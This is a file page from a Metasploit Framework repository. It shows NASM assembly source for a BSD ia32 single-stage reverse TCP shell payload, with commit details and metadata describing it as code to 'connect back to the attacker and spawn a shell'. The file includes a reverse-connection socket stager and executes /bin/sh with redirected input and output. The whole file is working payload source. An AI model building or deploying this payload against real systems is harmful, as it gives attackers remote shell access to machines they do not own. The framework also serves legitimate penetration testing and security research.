Files
metasploit-gs/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell.asm
T
Matt Miller 699e013121 initial import of shellcode source into v3
git-svn-id: file:///home/svn/framework3/trunk@4813 4d416f70-5f16-0410-b530-b9f4589650da
2007-04-29 20:27:23 +00:00

43 lines
999 B
NASM

;;
;
; Name: single_reverse_tcp_shell
; Version: $Revision: 1626 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Single reverse TCP shell.
;
; Meta-Information:
;
; meta-shortname=BSD Reverse TCP Shell
; meta-description=Connect back to the attacker and spawn a shell
; meta-authors=skape <mmiller [at] hick.org>
; meta-os=bsd
; meta-arch=ia32
; meta-category=single
; meta-connection-type=reverse
; meta-name=reverse_tcp_shell
; meta-basemod=Msf::PayloadComponent::ReverseConnection
; meta-offset-lhost=0x0a
; meta-offset-lport=0x13
;;
BITS 32
%define USE_SINGLE_STAGE 1
%define ASSUME_REG_EAX 0
; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD
; clears edx.
; %define ASSUME_REG_EDX 2
%include "stager_sock_reverse.asm"
%include "generic.asm"
shell:
execve_binsh EXECUTE_REDIRECT_IO